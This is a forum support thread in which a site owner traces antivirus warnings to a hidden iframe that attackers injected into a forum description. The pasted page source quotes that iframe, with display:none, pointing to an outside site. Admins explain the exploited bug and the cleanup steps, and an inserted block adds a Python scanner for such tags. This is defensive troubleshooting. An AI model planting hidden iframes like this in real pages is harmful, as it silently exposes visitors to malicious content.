RhinoOffRoad
New Member
USA
71 Posts |
Posted - 15 April 2008 : 20:56:16
|
I own http://UtilityOffRoad.com/forum and when you go to the page you get a virus warning. I've reinstalled the board with a copy I know to be clean and then copied the DB over. How do I remove this issue from the DB? Browser says my site wants to run a networking/webcam application from Yahoo. Thanks, |
Nathan In Montana
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 02:03:25
|
quote: Originally posted by ruirib
No warnings for me.
Thank you for checking, sir. This is the exact warning I get. Not only is my antivirus flagging it, but also Internet Explorer is saying the website wants to load the webcam/network application from Yahoo. Some of my users get it, some don't. I have flushed my temporary internet files, no difference. I scan the DB directly with my anti-virus and nothing comes up, but when I try to open the DB with Access I get a warning from Access saying it's unsafe to open the DB. I opened it on my testing computer and Access opens it just fine but I cannot find the source of the problem. Any ideas sincerely appreciated. I cannot let my site develop a bad reputation. Thanks, |
Nathan In Montana
|
Edited by - RhinoOffRoad on 16 April 2008 02:04:08 |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 16 April 2008 : 02:24:48
|
I run AVG on a work computer and it does that quite a few times, but it's AVG acting stupidly.
Access will give you that warning with all the databases, unless you add the location of your database to the list of trusted locations (a stupid thing, IMO, that I really can't understand). Basically it's stupid behavior from Access as well. |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 10:16:40
|
What is the "webcam/networking" application that Internet Explorer says my site is trying to run? I installed another clean copy of Snitz and replaced the DB and I get the same thing. I'm running about a dozen Snitz-based forums right now and copied over one with the same fresh code that I used on this one and no other site does it. The only common denominator is the database. Thanks again, |
Nathan In Montana
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 11:58:04
|
quote: Originally posted by ruirib
The only common thing is likely the URL being used.
I don't understand what you mean by that. I replaced the board entirely with another DB and do not get the error. Is there a way to start the board over with a new DB and at least import the membership information from the old DB so I don't have to start over from 1 user?
quote: I don't think you have anything to worry about. Both IE and Firefox show no issues on your site.
Any idea why some users would be getting the warning and some not? Even if no real threat exists, perceived threat is enough to keep people away from my site. If I get a bad reputation online as a virus site I'll lose members. Thanks again for your help on this matter. |
Nathan In Montana
|
Edited by - RhinoOffRoad on 16 April 2008 11:58:57 |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 16 April 2008 : 12:10:56
|
Is someone using a non AVG antivirus getting warnings? My suspicion is that this is related to AVG free version alone, have seen it happen with such sites as a large newspaper in Portugal, with AVG free version... |
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 13:54:41
|
Without AVG I still get the warning for the webcam/networking app claiming to be from Yahoo. If you load my page and view the source you'll find a reference to "<iframe src="http://www.yourxxxblog.biz/js_go_f1.php" in the code. I've just found this and am now looking for the source. |
Nathan In Montana
|
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 14:08:48
|
OK, when I go to the URL I pasted above I get the same error from AVG as well as from Internet Explorer. I'm satisfied that I don't have a virus on my site, but cannot find where the redirect is coming from. Is there a way to bury that URL in my DB and if so how do I remove it? If I replace my DB I no longer get the error. Thanks, |
Nathan In Montana
|
|
|
AnonJr
Moderator
United States
5768 Posts |
Posted - 16 April 2008 : 14:30:08
|
There have been some hackers going around and exploiting the bug that was patched back in 1 Dec. 2007. Some of the hacked forums had HTML turned on, and the <iframe> code inserted into the description of one or more forums. If you have not yet applied that patch, you will definitely want to do so. I'd also subscribe to the "Announcements: Security Related Bug Fixes" forum if you haven't already done so.
After all that, I would first check to see if you have any extra Admins that shouldn't be there. If you find one, demote him and then lock the member.
I would then go through the admin settings and make sure that nothing has been changed. (Turning on HTML, changing the forum's URL in the admin options, etc.)
I would then edit each forum and check the description to see if there has been anything added that shouldn't be there. (JavaScript, an <iframe>, etc.)
These steps and more are more fully laid out here: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=66113 |
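
As an added example (not part of the original thread or of Snitz), the description check above can be run against a saved copy of the forum index page: this Python scanner flags hidden or off-site `<iframe>`, `<script>`, `<object>` and `<embed>` tags and reports the `FORUM_ID` of the nearest preceding forum link, which is the forum whose description to edit. The sample HTML, the host names and the names `InjectionScanner` and `scan_page` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ACTIVE_TAGS = {"iframe", "script", "object", "embed"}
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
FORUM_LINK = re.compile(r"forum\.asp\?FORUM_ID=(\d+)", re.I)

# Constructed sample modelled on the markup quoted in this thread (hosts are placeholders).
SAMPLE_PAGE = '''
<td><a href="forum.asp?FORUM_ID=1">General</a><br /><font size="1">Chat</font></td>
<td><a href="forum.asp?FORUM_ID=2">Admin Log</a><br /><font size="1">Restricted Access<br />
<iframe src="http://injected.example/go.php" style="display:none"></iframe></font></td>
<script src="/forum/menu.js"></script>
'''

class InjectionScanner(HTMLParser):
    """Collect active-content tags that are hidden or load from another host."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.forum_id = None          # last forum.asp?FORUM_ID=n link seen so far
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        m = FORUM_LINK.search(a.get("href", ""))
        if tag == "a" and m:
            self.forum_id = int(m.group(1))
        if tag not in ACTIVE_TAGS:
            return
        src = a.get("src") or a.get("data") or ""
        host = (urlparse(src).hostname or "").lower()
        external = bool(host) and host != self.site_host
        tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        hidden = bool(HIDDEN_CSS.search(a.get("style", ""))) or tiny
        if external or hidden:        # same-host, visible tags are left alone
            self.findings.append({"forum_id": self.forum_id, "tag": tag,
                                  "src": src, "hidden": hidden, "external": external})

def scan_page(html, site_host):
    """Return one finding per suspicious tag in the saved page source."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "forum.example"):
        print(f)
```

Inline script with no `src` is not flagged by this check, so descriptions still need a manual read for embedded JavaScript.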
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 14:33:13
|
looking at my source:
<td bgcolor="white" align="center" valign="top"><a href="forum.asp?FORUM_ID=2"><img src="icon_folder.gif" width="15" height="15" border="0" alt="Old Posts" title="Old Posts" hspace="0" /></a></td> <td bgcolor="white" valign="top"><font face="Verdana, Arial, Helvetica" color="black" size="2"><span class="spnMessageText"><a href="forum.asp?FORUM_ID=2">Admin Log</a><br /><font size="1"> Restricted Access<br /><iframe src="http://www.yourxxxblog.biz/js_go_f1.php" style="display:none"></iframe></font></span></font></td>
I could find the URL but looking through my pages yielded nothing. Since this mentioned ""><a href="forum.asp?FORUM_ID=2">" I deleted forum ID 2 and the problem went away. Trouble is, forum 2 was an admin-only, private forum with one single thread in it. It was also only moderators who got that initial error. I saw nothing within forum #2 that would cause a redirect like this but I do have an intact copy of the infected DB for you if you would like to look into it for another possible vulnerability. |
Nathan In Montana
|
Edited by - RhinoOffRoad on 16 April 2008 14:33:49 |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 16 April 2008 : 14:38:21
|
Well yesterday I had searched for an iframe but hadn't found it. The iframe can simply be removed by editing the forum properties for the forum with ID=2. My browser was not being affected by the dang iframe, so maybe my ZoneAlarm prevented me from seeing the effects of the thing. As you said, however, it's not a virus and it has a simple solution - just edit the forum properties and remove the iframe from the forum description. |
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 14:56:58
|
Thanks again for the help. I came away from this one a little bit wiser. |
Nathan In Montana
|
|
|
|